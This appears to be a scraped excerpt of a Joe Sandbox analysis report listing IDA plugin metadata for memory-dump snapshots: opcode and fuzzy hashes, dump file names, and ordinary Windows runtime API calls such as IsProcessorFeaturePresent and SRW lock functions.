                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                              • String ID: xf/
                                                                                                                                                                                                                                                              • API String ID: 3761405300-1037373826
                                                                                                                                                                                                                                                              • Opcode ID: 6073fc6d0b399c5c0eb0e714640d47c9d61044afb6850ec5578e3180009c5d3e
                                                                                                                                                                                                                                                              • Instruction ID: fbfd1943e79c7749dd3b6b93d22dd7e54ca968a264b07c9bc0b9fcf6d91a4d34
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6073fc6d0b399c5c0eb0e714640d47c9d61044afb6850ec5578e3180009c5d3e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F721BFB4511304DBE700EF25F94DA64BBB4FB487A8F60507AE504CA3A0E3B5A980CF44
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002D4A97
                                                                                                                                                                                                                                                              • ___raise_securityfailure.LIBCMT ref: 002D4B54
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                              • String ID: xf/
                                                                                                                                                                                                                                                              • API String ID: 3761405300-1037373826
                                                                                                                                                                                                                                                              • Opcode ID: 434ceb9d061d2fa57875019444e4e9dfd18d7b6163076156742dc7bffa57396c
                                                                                                                                                                                                                                                              • Instruction ID: ecd449cc0dc407bbab89e888d35b14a581dae11a34690b5c8ccef05b02b57f99
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 434ceb9d061d2fa57875019444e4e9dfd18d7b6163076156742dc7bffa57396c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D91172B45513089FD700EF26F94DA60BBF4FB587A8B10917AE80887370E7759941DF45
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(002F648C,ios_base::badbit set,?,?,002D1C84,002F6478,002D1B17), ref: 002D29DF
                                                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(002F648C,?,?,002D1C84,002F6478,002D1B17), ref: 002D2A19
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                                                                              • String ID: ios_base::badbit set
                                                                                                                                                                                                                                                              • API String ID: 17069307-3882152299
                                                                                                                                                                                                                                                              • Opcode ID: 018bd3de3df93f0772da2baa99f33d94ff1d108c61526869d88a584c7e214d2e
                                                                                                                                                                                                                                                              • Instruction ID: 1bc0d348e1acfaba86ee5b2c0ac8e9946153f7a431d8bbebc9c85fe20869cd69
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 018bd3de3df93f0772da2baa99f33d94ff1d108c61526869d88a584c7e214d2e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11F05830520245CBC720EF18E818A75BBB8FB957B4F20033AE9AA433A0C7711C66CA51